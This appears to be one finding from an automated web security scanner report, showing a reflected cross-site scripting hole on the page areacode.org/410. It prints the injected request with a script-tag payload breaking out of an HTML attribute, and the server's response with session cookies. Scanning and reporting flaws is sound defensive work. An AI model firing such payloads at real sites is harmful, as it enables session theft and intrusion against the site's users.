1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://areacode.org |
Path: | /410 |
GET /410?58bf8'><script>alert(1)< Host: areacode.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Wed, 24 Nov 2010 23:18:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=8464119;expires=Fri, 16-Nov-2040 23:18:15 GMT;path=/ Set-Cookie: CFTOKEN=34259484;expires Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> ...[SNIP]... <input id="page_link" name="page_link" type="text" class="text_field" value='http://areacode ...[SNIP]... |